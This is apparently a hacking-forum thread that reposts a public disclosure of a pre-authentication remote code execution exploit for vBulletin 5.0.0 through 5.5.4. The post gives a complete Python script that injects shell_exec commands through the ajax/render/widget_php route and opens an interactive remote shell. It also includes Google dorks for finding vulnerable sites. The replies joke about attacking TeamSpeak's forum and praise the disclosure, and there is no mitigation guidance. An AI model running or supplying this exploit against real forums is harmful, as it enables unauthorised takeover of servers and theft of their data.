vBulletin 0day <5.5.4

ehthe

Retired Staff
Contributor
Apr 26, 2015
1,028
896
216
Received via fulldisclosure / other source : https://packetstormsecurity.com/files/154595/vbulletin5x-exec.txt
Python:
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))

I wonder what version teamspeak's forum is using :) (No I ai'nt doing it)
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
1569354384101.png

TeamSpeak's forum is showing 4.2.3 yes, but this is still an incredibly cool disclosure!
 
Top